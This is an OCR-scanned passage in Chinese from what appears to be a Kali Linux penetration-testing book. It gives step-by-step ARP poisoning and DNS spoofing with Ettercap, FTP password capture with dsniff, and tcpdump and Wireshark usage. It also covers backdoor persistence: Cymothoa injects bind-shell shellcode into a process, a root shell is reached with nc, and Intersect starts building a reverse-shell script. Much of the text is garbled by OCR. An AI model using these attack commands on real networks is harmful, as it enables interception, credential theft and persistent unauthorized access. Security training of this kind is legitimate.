ARP 协 议 〈 地 址 解析 协议 ) 用 来 把 了 下地 址 解析 为 物理 地 址 (MAC 地 
HE) 。 当 某 个 网 络 设备 需要 与 其 他 网 络 资源 通信 时 ， 它 会 通过 ARP 广 播 
查询 目标 设备 的 MAC 地 址 ， 目 标 设备 也 会 通过 ARP 协 议 的 数据 包 回 复 
自己 的 MAC 地 址 。 此 后 ， 通 信 双 方 都 会 将 了 和 MAC 的 对 应 信息 保存 到 
目 己 的 ARP 绥 存 中 ， 以 节省 后 续 通 信 的 查询 时 间 。 

在 某 台 主机 要 进行 通信 时 ， 它 站 先 会 查询 对 方 IP 地 址 的 MAC 地 址 。 
此 时 ， 攻 击 人 员 可 将 自己 主机 回复 给 查询 MAC 地 址 的 主机 ， 以 进行 中 
间 人 攻击 。 这 种 攻击 叫做 ARP 毒 化 (污染 ) 攻击 和 ARP 欺 骗 。 只 有 当 攻 
击 主机 和 被 测 主 机 处 于 同一 网 段 的 时 候 ， 这 种 攻击 才 会 有 效 。 

Kali Linux 提供 的 Ettercap 工具 可 以 实施 这 种 攻击 。Ettercap 有 三 种 
操作 模式 : 文本 模式 、 仿 图 形 (curses， 以 字符 模拟 图 形 界 面 〉 模式 和 
GTK MREŽI. 

若 要 以 文本 模式 启动 Ettercap 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# ettercap -T 

若 要 以 仿 图 形 模 式 启动 它 ， 可 在 终端 中 使 用 下 述 指令 。 

# ettercap -C 

F UE A EttercapW KÆRAN, BYTE ig AE FRS. 

# ettercap -G 

本 例 将 使 用 Ettercap 程 序 进行 DNS 欺骗 攻 击 。 各 主机 采用 了 前 一 个 
例子 的 配置 方法 。 此 外 ， 本 例 要 使 用 额外 的 两 台 主 机 : IP 为 192.16S.2.1 
的 DNS 服务 器 ;一 台 诱 导 被 测 主 机 连接 的 卫 地 址 为 192.168.2.22 的 Web 服 
务 器 。 攻 击 人 员 测 试 主机 的 IP 地 址 为 192.168.2.21。 

欺骗 攻击 的 详细 步 又 如 下 。 














1. 进入 Ettercap 的 图 形 模 式 。 

2. 在 菜单 里 依次 选中 Sniff | Unified sniffing， 选 则 相应 的 网 卡 ， 如 图 
10.25 所 示 。 

ettercap NG-0.7.4.2 -— - 


File 一 Options Help 


Bridged sniffing... Shift+B 


Set pcap filter... P 











图 10.25 
3. 在 菜单 中 选择 Hosts | Scan for hosts， 扫 描 网 络 中 的 主机 。 
4. 在 菜单 中 选择 Hosts | Hosts list， 查 看 当前 联网 的 主机 。 
5. 指定 要 欺 驴 的 主机 。 本 例 中 ， 我 们 选择 192.168.2.1 (DNS 服务 
$8) 作为 第 一 目标 。 在 主机 列表 中 ， 选 中 这 个 IP， 然 后 点 击 Add to 





Target ”1。 接 下 来 ， 选 中 192.168.2.22 并 把 它 添加 为 第 二 目标 Add to 
Target 22， 如 图 10.26 所 示 。 


ettercap NG-0.7.4.2 


Start Targets Hosts View Mitm Filters Logging Plugins Help 


Host List A | Plugins M | 


Name Version Info 

arp.cop 1.1 Report suspicious ARP activity 

autoadd 1.2 Automatically add new victims in the target range 
chk. poison 1.1 Check if the poisoning had success 


dns. spoof 1.1 Sends spoofed dns replies 








dos. attack 1.0 Run a d.o.s. attack against an IP address 


ARP poisoning victims: 
GROUP 1: 192.168.2.1 F4:EC:38:EC:07:0C 


GROUP 2: 192.168.2.22 08:00:27:43:15:18 


Activating dns. spoof plugin... 








[110.26 

6. 在 菜单 里 依次 选中 Mitm| Arp poisoning， 以 启动 ARP 攻击 。 现 在 
DNS 服务 器 和 被 测 的 MAC 地 址 均 认为 对 方 的 IP 使 用 的 是 攻击 人 员 主 机 
的 MAC 地 址 。 

7. 调整 配置 文件 /usr/share/ettercap/etter.dns， 将 诱导 服务 器 的 IP 地 
址 绑 定 在 需要 欺骗 (拦截 ) 的 域名 上 。 

google.com A 192.168.2.21 

* google.com A 192.168.2.21 

www.google.com PTR 192.168.2.21 

这 将 把 被 测 主机 与 google.com 之 间 的 全 部 通信 诱导 到 攻击 人 员 部 署 
的 Web 服 务 器 上 。 

8. 在 菜单 里 依次 选中 Plugins | Manage the plugins， 然 后 双击 ( 激 





活 ) dns_spoof 插 件 〈 见 图 10.27) 。 
9. 最 后 ， 我 们 在 被 测 主机 上 打开 浏览 器 ,访问 google.com。 这 将 看 
到 图 10.28 所 示 的 信息 。 


ettercap NG-0.7.4.2 


PPE Plugins M 


arp.cop . Report suspicious ARP activity 


autoadd . Automatically add new victims in the target range 


chk. poison ‘ Check if the poisoning had success 


* dns spoof . Sends spoofed dns replies 





dos. attack : Run a d.o.s. attack against an IP address 


P poisoning victims: 
GROUP 1: 192.168.2.1 F4:EC:38:EC:07:DC 


GROUP 2: 192.168.2.22 08:00:27:43:15:18 
Activating dns. spoof plugin... 





图 10.27 





E mozilla Firefox - 


Fie Edt View History Bookmarks Tools Help 
SD - & @ [oe res c0040 con 
Ml] Most viskedY ©) Getting Started K] Latest Headines Y 


© http igoogle corry 中 
It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 





图 10.28 

XRT LAH, DNS CASE. BCU EDL A SAER 
Google yh, ERM AS Ne A D Ber] Web HC óS AF o 

10. ”如 震 停 止 攻 击 ， 可 在 菜单 中 依次 选中 Mitm | Stop mitm 
attack(s). 

BI ones ED FERVENT RA, RANGE. fEEttercap lt) 
文本 模式 里 ， 这 些 操作 要 简洁 得 多 。 

在 文本 模式 里 ， 以 下 指令 就 可 完成 刚才 的 前 8 步 操 作 (第 7 步 除 
A s 

# ettercap -i ethO -T -q -P dns spof -M ARP 
/192.168.2.1//192.168.2.22/ 

上 述 指令 的 运行 结果 如 下 。 

Scanning for merged targets (2 hosts)... 


2 hosts added to the hosts list... 








ARP poisoning victims: 

GROUP 1: 192.168.2.1 F4:EC:38:EC:07:DC 

GROUP 2: 192.168.2.22 08:00:27:43:15:18Starting Unified sniffing... 
Activating dns_spoof plugin... 


dns_spoof: [safebrowsing-cache.google.com] spoofed to [192.168.2.21] 
只 要 熟悉 了 Ettercap 各 选项 的 使 用 方法 ， 束 会 发 现 Ettercap 的 文本 模 
式 十 分 方便 。 在 文本 模式 里 ， 按 Q 键 就 可 退出 程序 。 











网 络 咒 探 器 器 是 监视 网 络 数 据 的 软件 程序 或 硬件 设备 。 人 们 往往 利 
用 它 复 制 网 络 数 据 的 功能 来 检测 网 络 数 据 。 借 助 这 类 工具 ， 您 可 以 看 到 
网 络 中 正在 传输 的 信息 。 

不 久之 前 ， 网 络 嗅 探 器 只 是 网 络 工程 师 用 来 解决 网 络 问题 的 工具 。 
但 是 ， 它 确实 可 以 用 来 作恶 。 如 果 网 络 数据 以 明文 传输 ， 且 计算 机 之 间 
通过 集线器 交换 数据 ， 那 么 网 络 里 的 通信 信息 ， 例 如 用 户 名 、 和 密码 、 邮 
件 内 容 等 ， 将 很 容易 被 他 人 捕获 。 幸 运 的 是 ， 如 果 使 用 交换 机 组 网 ， 那 
么 捕获 数据 的 难度 会 高 一 些 ， 但 是 他 人 仍然 能 够 捕获 信息 。 

许多 工具 程序 都 可 用 作 网 络 嗅 探 器 。 本 章 将 介绍 几 款 Kali Linux WA 
录 了 的 网 络 嗅 探 器 。 多 数 情况 下 ， 您 需要 在 噢 探 数 据 以 前 进行 网 络 坎 骗 
攻击 《请 参考 10.3 节 ) ， 因 为 它 通 常 是 成 功 施行 网 络 嗅 探 的 前 提 。 


Dsniff ”能 够 在 网 络 中 捕获 密码 。 目 前 ， 它 可 从 以 下 协议 中 捕获 密 
伺 : FITP、Telnet、SMTP、HTTP、POP、poppass、NNTP、IMAP、 
SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP、 NFS, 
VRRP, YP/NIS. SOCKS, X11. CVS, IRC, AIM, ICQ, Napster, 
PostgreSQL. Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI 
Sniffer, Microsoft SMB. Oracle SQL*Net, Sybase 以 及 Microsoft SQL. 

如 需 启动 dsniff 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# dsniff -h 














上 述 指令 将 会 在 屏幕 上 显示 程序 的 使 用 说 明 。 我 们 将 使 用 它 捕 获 
FIP 密码 。 在 本 例 的 演示 中 ，FTP 客 户 端 的 IP 是 192.168.2.20， 服 务 器 IP 
则 是 192.168.2.22， 这 两 台 主 机 通过 集线器 连接 。 攻 击 人 员 的 主机 IP 为 
192.168.2.21。 

在 攻击 人 员 的 测试 主机 上 执行 下 述 指 令 。 

# dsniff -i ethO -m 

其 中 ， 选 项 -i eth0 将 使 Dsniff 程序 监听 eth0 网 卡 。 而 选项 -m 则 用 于 
启用 程序 的 自动 协议 检测 功能 。 

然后 ， 在 装 有 FTP 客 户 端 程序 的 主机 上 ， 使 用 客户 端 程序 登录 FTP 
服务 器 。 

dsniff 的 运行 结果 如 下 。 

dsniff: listening on ethO 








20/08/13 18:54:53 tcp 192.168.2.20.36761 -> 192.168.2.22.21 (ftp) 

USER user 

PASS user01 

MPa Lal], dsnifffijzk S&P 9m Soe PTP ARS as IN At H AA A 4 
和 密码 。 

10.4.2 tcpdump 

tcpdump 程 序 是 一 球 网 络 串 探 嚣 ， 它 可 以 捕获 符合 条 件 表达 式 的 网 
络 数据 包 。 在 没有 指定 条 件 表达 式 的 情况 下 ， 它 会 显示 所 有 网 络 数据 
包 。 而 在 指定 条 件 表达 式 的 情况 下 ， 它 只 会 捕获 符合 条 件 表达 式 的 数据 
Eo 

tcpdump 还 可 以 将 网 络 数据 包 存 储 为 文件 ， 或 从 文件 中 读 取 网 络 数 
We 

如 需 司 动 ttpdump 程 序 ， 可 在 终端 中 执行 下 面 这 类 指令 。 








# tcpdump —i eth0 —s 96 

这 个 命令 将 监听 eth0 网 卡 (-i ethO) ， 捕 获 大 小 为 96 FAT C-s 96) 
的 数据 包 。 

现在 尝试 嗅 探 从 IP 地 址 10.0.2.15 到 10.0.2.100 的 ICMP 封 包 ， 这 里 设 
置 咒 探 eth0 接口 (-i eth0) ， 不 需要 把 地 址 转换 成 主机 名 Cn), Ai 
要 打印 时 间 惟 《〈-t) ， 用 十 六 进 制 格式 和 ASCI 格 式 打 印 封包 头 和 数据 
CX) 。 在 主机 10.0.2.15 处 输入 : 

# tcpdump -n -t -X -i ethO —s 64 icmp and src 192.168.56.102 and 
dst192.168.56.101 

上 述 指令 的 运行 结果 如 图 10.29 所 示 。 
root@kali:~# tcpdump -i ethO -s 64 -t -n -X icmp and src 192.168.56.102 and dst 192.168.56.101 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on ethO, link-type EN10MB (Ethernet), capture size 64 bytes 
IP 192.168.56.102 » 192.168.56.101: ICMP echo request, id 3860, seq 1, length 64 


0x0000: 4500 0054 9646 4000 4001 b246 c0a8 3866 E..T.FQ.Q..F..8f 
0x0010: cOa8 3865 0800 2134 0f14 0001 34fd ee52 ..86..!4....4..R 











0x0020: 0000 0000 e393 0200 0000 0000 1011 1213 ................ 
0x0030: 1415 ox 


图 10.29 
因为 指定 了 条 件 表 达 式 ，tcpdump 程 序 只 会 显示 符合 条 件 表达 式 的 
网 络 数据 包 。 在 上 述 指令 中 ， 我 们 限定 程序 只 显示 由 IP 为 192.168.56.102 
的 主机 向 IP 为 192.168.56.101 的 主机 发 送 的 ICMP 数 据 包 。 


10.4.3 Wireshark 


Wireshark 是 一 个 网 络 协议 分 析 程 序 。 它 的 图 形 程序 可 对 它 捕获 的 数 
据 包 进行 可 视 化 分 析 ， 有 助 于 使 用 人 员 理 解数 据 包 中 的 各 种 信息 。 

Wireshark 的 特征 有 : 

e 能 够 分 析 1000 多 种 网 络 协议 ; 

e 能 够 实时 捕获 网 络 数据 包 ， 并 能 对 数据 包 进 行 离线 分 析 ; 

e 它 具 有 业内 功能 最 强大 的 数据 包 整 理 〈 显 示 过 滤 ) 功能 ; 

e 它 的 GUI 图 形 界 面 程序 和 命令 行程 序 TShark 都 可 以 显示 数据 包 ; 

e SF GES) 多 种 文件 格式 的 数据 包 文 件 。 兼 容 




















tcpdump (libpcap) ~ Network GeneralSniffer、Cisco Secure IDS iplog、 
Microsoft Network Monitor 等 程序 的 文件 格式 ; 

e 可 从 IEEE 802.11、 蓝 牙 、 以 太 网 设备 实时 读 取 数据 ; 

e 可 将 结果 导出 为 XML、 了 Postscript、CSV 和 文本 格式 的 文件 。 

如 需 启 动 Wireshark 程序 ， 可 在 桌面 荣 单 中 依次 选中 Kali Linux| 
Sniffering/Spoofing |Network Sniffers | wireshark， 或 者 在 终端 中 使 用 下 述 
指令 。 

# wireshark 

上 述 指令 将 局 动 Wireshark 网 络 协议 分 析 程 序 。 如 果 要 捕捉 网 络 数 
据 ， 可 以 在 Interface List 中 选择 相应 的 网 卡 ， 如 图 10.30 所 示 。 


The Wireshark Network Analyzer 
Ele Edit View Go Capture Analyze Statistics Telephony Tools Help 


-ECET mxX0= LK OZ CO BG ¢@e 


Filter: | Ea Expression... Clear Apply 


The World's Most Popular Network Protocol Analyzer 





E" Interface List 2 Open 


Live list of the capture interfaces (counts incoming packets) Open a previously captured file 


Start capture on interface: Open Recent: 


etho 
A) Pseudo-device that captures on all interfaces uj Sample Captures 
USB bus number 1 A rich assortment of example capture files on the wiki 
USB bus number 2 
S) lo a 


rr — - — —— — ap) 
@| Ready to load or capture | No Packets -][Profile: Default E 


[110.30 
Wireshark} 7 f& O E Sj a E a Ur BH IR] OD SUI D E. URL LE 
捕捉 网 络 数据 ， 可 以 点 击 顶 端 工具 栏 中 第 四 个 按钮 Stop running the live 
capture， 或 着 在 末 单 里 选择 Capture | Stop. 
如 图 10.31 所 示 ， 可 以 在 Filter 栏 里 设置 过 小 规则 ， 以 显示 特定 的 数 
据 包 。 




















Capturing from ethO [Wireshark 1.8.5] BEJ 


File Edt View Go Capture Analyze Statistics Telephony Tools Internals Help 





& 5g a .xecee&aqe»^t£íEm Goo Bsa s 
Filter: |icmp $ | Expression... Clear ^p; Save 
No. Time Source Destination Protocol Length Info 





23 11.957746000 192.168.2.21 192. 168.2. 22 : 98 Echo (ping) request id=0xlb9a, seq=1/256, ttl=64 
24 11.958662000 192. 168.2.22 cho (p: 1d=Ox1b9 Seq=1/ : 





P Frame 23: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface O 

P Ethernet II, Src: CadmusCo 1c:51:22 (08:00:27:1c:51:22), Ost: CadmusCo 43:15:18 (08:00:27:43:15:18) 
P Internet Protocol Version 4, Src: 192.168.2.21 (192.168.2.21), Ost: 192.168.2.22 (192.168.2.22) 

b Internet Control Message Protocol 





08 OO 27 43 15 18 O8 OO 27 lc 51 22 08 00 45 OO ee Crees "QU... E. 
10 00 54 OO OO 40 OO 40 01 bs 2d cO a8 02 15 cO a8 AET A .+...... 
20 02 16 08 00 45 79 1b 9a 00 01l f3 7c 1f S2 00 00 vec Ben ccs] sae 
30 00 00 bd 49 08 OO OO OO 00 OO 10 11 12 13 14 15 ess looco covseove 
O 16 17 18 19 la lb le ld le 1f 20 21 22 23 24 25  ........ .. #3% 
26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 $e 7012345 
36 37 





图 10.31 

在 图 10.31 中 ， 我 们 在 Filter 栏 里 设 定 好 了 过 滤 规 则 icmp， 以 使 程序 
只 显示 ICMP 协 议 的 数据 包 。 

如 采 需 要 调整 捕获 数据 包 的 具体 设置 ， 可 在 荣 单 Capture | Options 
中 调整 相应 的 选项 ， 或 在 Wireshark 主 界面 中 直接 选中 Capture Options 
的 图 标 《“ 见 图 10.32) 。 

在 这 个 界面 中 ， 您 可 以 调整 以 下 设置 。 

e Network interface (网 络 接口 /网 卡 〉。 

e Buffer Size〈 绥 冲 区 大 小 ) : 默认 为 1MB。 

e Packet limitation (数据 包容 量 上 限 ， 以 字 节 为 单位 ): 默认 情况 
下 没有 限制 。 

e Capture filter to be used (捕获 规则 〉: 默认 情况 下 没有 过 滤 规 
则 。 

o 如 需 保 存 捕获 到 的 数据 ， 可 在 Capture file(s) 区 域 里 设置 输出 文件 
的 文件 名 。 

o 如 需 设 置 自动 停止 的 功能 ， 可 在 StopCapture 区 域 里 设置 自动 停止 
捕获 数据 的 触发 条 件 。 触 发 条 件 可 以 是 捕获 数据 包 的 数量 、 捕 获 数 据 包 
的 作业 时 间或 是 数据 包 的 大 小 。 








o 在 Name Resolution 区 域 里 ， 各 选项 用 于 控制 MAC 地 址 解析 、 网 
络 名 称 解 析 和 传输 名 称 解 析 的 功能 选项 。 


Wireshark: Capture Options 














Capture Interface Link-Layer header Prom. Mode Snaplen [B] 
etho 


v 192.168.221 Ethernet enabled default 
fe80:300:27ff fe1c. 5122 










DD Linux netfilter log (NFLO... Linux netfilter log messages enabled default 





Pseudo-device that captu... Linux cooked enabled default 






( Capture on all interfaces 
M. Capture all in promiscuous mode 


Manage Interfaces 



































Capture File(s) 一 一 一 一 一 一 bia Options 
w[ ëO E? Updete st of packets in real time 
C Use multiple files V! Use pcap-ng format 
M. Next file every [1 ls f(Degsoyre s - C Automatic scrolling in live capture 
Next file every - ninute(s 2: " E 
O Next fil r 1 Ble ute(s) & Hic capture info dialog 
口 Ring buffer with 2 [* files | 
= -Name Resolution 
O Stop capture after |1 I1 file(s) 
| b [e | | 
-Stop Capture ... | Z) Enable MAC name resolution 
O ... after [1 |=] Packets) : 
LJ Enable network name resolution 
图 10.32 


10.5 本 音 总 结 





本 章 演 示 了 提升 本 地 权限 以 及 网 络 串 探 和 网 络 欺骗 的 具体 方法 。 此 
处 介绍 的 所 有 工具 都 可 用 来 取得 更 高 的 访问 权限 。 攻 击 人 员 可 以 通过 网 
络 嗅 探 和 网 络 欺骗 手段 获得 更 多 的 信息 ， 还 可 能 获取 进入 内 网 或 者 外 网 








中 其 他 主机 的 方式 ， 这 些 信息 中 可 能 含有 更 具 价 值 的 信息 。 

我 们 最 先 介绍 了 本 地 权限 提升 漏洞 的 利用 方法 。 在 利用 被 测 主 机 的 
网 络 服务 漏洞 之 后 ， 我 们 发 现 获取 的 权限 很 低 ， 接 着 我 们 将 上 自己 的 权限 
提升 为 root 权限 。 通 过 本 地 安全 漏洞 提升 权限 的 技术 有 很 多 ， 本 文 利 用 
的 是 内 核 漏洞 。 

接 下 来 ， 我 们 半 述 了 攻击 密码 的 方法 。 攻 击 的 方法 有 两 种 : 离线 攻 
击 和 在 线 攻击 。 大 多 数 的 离线 攻击 工具 可 利用 彩虹 表 提 高 破解 速度 ， 但 
同时 需要 消耗 大 量 的 人 硬盘 空间 。 离 线 攻 击 的 好 处 是 可 以 在 目 己 的 机 咱 上 
进行 ， 而 无 需 担 心 攻击 会 导致 目标 机 器 上 的 某 个 账户 被 封 停 。 在 线 攻击 
则 可 以 马上 查看 攻击 结果 ， 但 需要 小 心 攻击 可 能 导致 目标 机 器 上 的 茶 个 
账户 被 封 停 。 接 着 ， 本 章 介 绍 了 多 歼 嗅 探 网 络 的 工具 ， 最 后 还 介绍 了 一 
HEN FAY PER ER Be A Ls ZR TC RT Do Ls FALL 
之 下 ， 因 为 网 络 欺骗 工具 能 够 向 网 络 发 送 数 据 ， 所 以 属于 主动 攻击 工 
Ae 
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在 下 一 章 ， 我 们 讨论 如 何 维护 已 经 取得 的 访问 权限 。 


上 一 章 讨 论 了 在 目标 主机 上 提升 权限 的 方法 。 本 章 将 介绍 在 渗透 测 
试 过 程 的 最 后 一 个 环节 ， 即 帮助 我 们 随时 进入 目标 主机 的 方法 。 

在 完成 了 提升 权限 的 阶段 性 工作 之 后 ， 我 们 应 当 建 立 一 种 机 制 ， 以 
维持 对 目标 主机 的 控制 权 。 这 样 一 来 ， 即 使 我 们 所 利用 的 漏洞 被 补丁 程 
序 修复 ， 我 们 还 可 以 继续 控制 目标 系统 。 当 然 ， 在 做 这 项 测试 之 前 ， 必 
须要 争 得 客户 的 许可 。 

维持 控制 权 的 程序 可 分 为 以 下 几 类 ; 

e 操作 系统 后 门 ; 

e 隧道 工具 ; 

e Web Jal J. 





11.1 X É 


简单 地 说 ， 所 谓 后 门 (backdoor) ， 泛 指 绕 过 目标 系统 安全 控制 体 
系 的 正规 用 户 认证 过 程 而 维持 我 们 对 目标 系统 的 控制 权 ， 以 及 隐匿 我 们 
控制 行为 的 方法 。 本 节 将 介绍 多 球 操 作 系 统 的 后 门 程 序 。 

11.1.1 Cymothoa 

Cymothoa 是 一 球 可 以 将 shellcode 注入 到 现 有 进程 的 〈 即 播 进程 ) 
后 门 工 具 。 借 助 这 种 注入 手段 ， 它 能 够 把 shellcode 仿 装 成 常规 程序 。 它 
所 注入 的 后 门 程序 应 当 能 够 与 被 注入 的 程序 〈 进 程 ) 共存 ， 以 避免 被 管 
理 和 维护 人 员 怀 疑 。 将 shellcode 注 入 到 其 他 进程 ， 还 有 另外 一 项 优势 : 
即使 目标 系统 的 安全 防护 工具 能 够 监视 可 执行 程序 的 完整 性 ， 只 要 它 不 
检测 内 存 ， 那 么 它 就 不 能 发 现 《〈 插 进程 ) 后 门 程序 的 进程 。 


如 需 启动 Cymothoa 程 序 ， 可 使 用 下 述 指 令 。 

cymothoa 

人 Cymothoa 程序 的 帮助 信息 。 在 使 用 这 个 程序 
时 ， 必 须 通 过 -p 选项 指定 目标 进程 的 PID， 并 通过 -s 选 项 指定 shellcode 的 
编号 。 

您 可 在 目标 主机 上 使 用 ps 指令 ， 以 查看 程序 的 PID 信 息 。 男 外 ， 如 
图 11.1 所 示 ， 您 可 以 使 用 程序 的 -S 选 项 列 出 所 有 可 用 的 shellcode 和 对 应 
编号 。 


root@kali:~# cymothoa -S 





- bind /bin/sh to the provided port (requires -y) 
- bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org> 
- bind /bin/sh to tcp port with password authentication (requires -y -o) 
- /bin/sh connect back (requires -x, -y) 
- tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org) 
- script execution (see the payload), creates a tmp file you must remove 
- forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/ 
- serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com 
- forkbomb (just for fun...) - Kris Katterjohn 
open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org 
16 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com) 
11 - POC alarm() scheduled shellcode 
12 - POC setitimer() scheduled shellcode 
13 - alarm() backdoor (requires -j -y) bind port, fork on accept 
14 - setitimer() tail follow (requires -k -x -y) send data via upd 


图 11.1 
在 渗透 到 目标 主机 之 后 ， 可 把 cymothoa 的 可 执行 程序 复制 到 目标 主 
机 上 ， 继 而 生成 后 门 程序 。 
此 后 ， 您 需要 决定 shellcode 类 型 以 及 shellcode 的 宿主 进程 。 
在 Linux 系统 中 ， 我 们 可 使 用 ps-aux 指令 查看 当前 运行 的 所 有 程序 
进程 。 这 个 指 令 的 运行 吉 果 如 图 11.2 所 示 。 
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root 4248 0. 0 0? S 02:03 0:00 [nfsd) 
root 4249 0.0 0.0 0 0? s 02:03 0:00 [nfsd) 
rcot 4250 0.0 0.0 0 0? S 02:03 0:00 [nfsd] 
4 1 n nn n > 02-0 . 
.0 ? 02:0 FOET Lt mountd 
U.U UZ:U Ü emor 3 daemon --allow 0.0. 

b. .0 ? 02:0 0:0 di d adim --user daemon --allow 0.0. 
root 4325 0.0 ad $412 1728 ? Ss 02:03 0:00 /usr/lib/postfix/master 
postfix 4329 0.0 0.3 5420 1644 ? S 02:03 0:00 pickup -1 -t fifo -u -c 
postfix 4330 0.0 0.3 5460 1680 ? S 02:03 0:00 qmgr -1 -t fifo -u 
root 4333 0.0 0.2 5396 1192 ? Ss 02:03 0:00 /usr/sbin/nmbd -D 
root 4335 0.0 0.2 7724 1360 ? Ss 02:03 0:00 /usr/sbin/smbd -D 

0 0.1 ? 02:0 0:00 /usr/sbin/smbd -D 





图 11.2 

虽然 返回 结 末 分 为 很 多 列 ， 但 是 我 们 只 关注 以 下 几 列 。 

o 第 一 列 : 启动 用 户 。 

e 第 二 列 : PID. 

e 最 后 一 列 : 指令 。 

本 例 中 ， 我 们 选 定 PID 4255 的 进程 (rpc.mountd) 为 和 宿主 进程 ， 并 
决定 使 用 第 一 类 shellcode。 男 外 ， 我 们 还 需要 使 用 -y [port number] 选 
项 指定 payload 的 服务 端口 。 综 合 以 上 信息 ， 我 们 需要 使 用 的 指令 如 下 
所 示 。 

./cymothoa -p 4255 -s 1 -y 4444 

上 述 指令 的 运行 结果 如 图 11.3 所 示 。 

[+] attaching to process 4255 


register info: 


eax value: Oxfffffdfe ebx value: 
esp value: Oxbfa55fb0 eip value: 0xb7f77410 


new esp: Oxbfa55fac 

payload preamble: fork 
injecting code into 0xb7f78000 
copy general purpose registers 
detaching from 4255 





infected!!! 
图 11.3 
我 们 另 找 一 台 主 机 ， 并 通过 下 述 指令 连接 到 目标 主机 的 后 门 〈4444 
号 端口 ) 。 


nc -nvv 192.168.56.102 4444 
其 中 ，192.168.56.102 是 目标 主机 的 IP 地 址 。 
我 们 将 会 看 到 图 11.4 所 示 的 信息 。 


itükali:-4 nc 192.168.56.102 4444 





lid 
uid=0( root) gid=0( root) 


uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU 
Linux 


ls 

etab 

rmtab 
rpc_pipefs 


State 
v4recovery 
xtab 





图 11.4 
恩 表明 ， 我 们 成 功 地 连接 到 远程 主机 的 后 门 之 中 ， 并 能 够 在 
"de TETIS 
这 种 后 门 程序 以 运行 中 的 程序 为 宿主 。 无 论 是 宿 te 
标 主机 重启 ， 此 类 后 门 程序 都 会 停止 运行 。 奉 要 突破 这 种 局 限 ， 束 需 
使 用 持久 型 后 门 (persistent backdoor) 。 








11.1.2 Intersect 


Intersect 是 一 款 适 合 在 漏洞 利用 以 后 使 用 的 能 够 自动 完成 多 种 后 期 
任务 的 程序 。 它 够 自动 收集 密码 文件 、 复 制 SSH 密 铀 、 收 集 网 络 信 
Ek, (basada UR 

EREE AIII EEZ, K mA ACARA, POENI 
本 中 指定 所 需 的 各 种 功能 。 s+ Intersect Hi, EA Ty He A 26] DY BY RE 
块 。 

















默认 安装 的 Intersect 程序 自身 就 带 有 多 个 功能 模块 。 在 这 些 模 块 之 





中 ， 


与 信息 收集 相关 的 模块 就 有 下 面 这 些 。 
ecreds: 收集 认证 信息 。 
e extras: 搜索 操作 系统 和 应 用 程序 的 配置 文件 ， 以 检索 特定 的 应 


用 程序 和 防护 程序 。 


块 。 


e network: 收集 网 络 信息 ， 例 如 服务 端口 和 DNS 信息 。 

e lanmap: 枚 举 在 线 主机 并 收集 卫 地 址 。 

e osuser: 枚 举 操作 系统 信息 。 

e getrepos: 用 于 查找 源 代码 的 软件 仓库 。 

e openshares: 在 特定 主机 上 查找 SMB 的 公开 共享 。 

e portscan: 简易 的 端口 扫 摘 程序 ， 可 扫 摘 特定 了 的 1 一 1000 端口 。 
e egressbuster: 在 指定 的 端口 范围 内 ， 搜 索 可 用 的 外 联 端 口 。 

e privsec: 检测 Linux 内 核 的 系统 是 否 存 在 可 提 权 的 漏洞 。 

e xmlcrack: 将 哈 希 列表 发 送 端 远程 XMLRPC， 以 继续 破解 。 

本 章 的 主题 是 维护 控制 权 ， 所 以 本 文 关注 那些 可 创建 shell 连 接 的 模 








e reversexor: 采用 XOR 加 密 的 reverse shell. 

e bshell: 基于 TCP 协议 的 bind shell. 

e rshell: 基于 TCP 协议 的 reverse shell. 

e xorshell: 采用 XOR 加 密 的 bind shell. 

e aeshttp: 采用 AES 算法 加 密 的 HTTP Reverse shell. 

e udpbind: 基于 UDP 协议 的 bindshell， 默认 端口 21541。 
e persistent: 会 在 系统 启动 时 自动 运行 的 持久 型 后 门 。 
在 创建 Intersect 的 脚本 文件 时 ， 需 要 遵循 的 以 下 几 个 通用 步 又 : 
e ite shell 模块 ; 

e 给 模块 的 变量 赋值 《例如 端口 号 码 和 远程 主机 ) ; 

e 保存 脚本 文件 。 

如 需 局 动 Intersect 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 





intersect 
上 述 指令 将 会 调 出 Intersect 的 程序 菜单 ， 如 图 11.5 所 示 。 








| | 
| | im 
post-exploitation framework 


1 => Create Custom Script 

2 -» List Available Modules 
3 => Load Plugin Module 

4 => Exit Creation Utility 





=> | 





图 11.5 
我 们 选择 Create Custom Script， 然 后 会 看 到 图 11.6 所 示 的 界面 。 





=> ] 


Intersect 2.0 - Script Generation Utility 
“= Create Custom Script ----------- 


Instructions: 


Use the console below to create your custom 
Intersect script. Type the modules you wish 
to add, pressing [enter] after each module. 
Example: 

=> creds 

=> network 


When you have entered all your desired modules 
into the queue, start the build process by typing :create. 


** To view a full list of all available commands type :help. 
The command :quit will return you to the main menu. 








图 11.6 
如 需 列 出 全 部 的 模块 ， 可 使 用 modules 指 令 。 该 指令 的 运行 效果 如 
图 11.7 所 示 。 


=> :modules 

rchive creds extras network reversexor scrub 

shell daemon lanmap osuser  rshell xorshell 

eshttp getrepos openshares portscan sniff webproxy xmp 
ressbuster icmpshell ersistent rivesc udpbind  xmlcrack 








我 们 残 可 通过 符号 => 指 定 某 个 模块 ， 或 用 info 指令 查询 某 模块 的 
具体 信息 。 例 如 ， 可 通过 下 述 指令 查询 creds 模 块 的 详细 信息 。 

:info creds 

本 例 将 使 用 reversexor 模 块 创建 持久 型 后 门 。 首 先 要 选 定 这 个 模 
块 。 

=> reversexor 


reversexor added to queue. 


然后 调整 模块 的 默认 选项 ， 并 创建 脚本 文件 〈 见 图 11.8) 。 





=> :create 


[ Set Options ] 

If any of these options don't apply to you, press [enter] to skip. 

Enter a name for your Intersect script. The finished script will be placed 
in the Scripts directory. Do not include Python file extension. 

=> test 

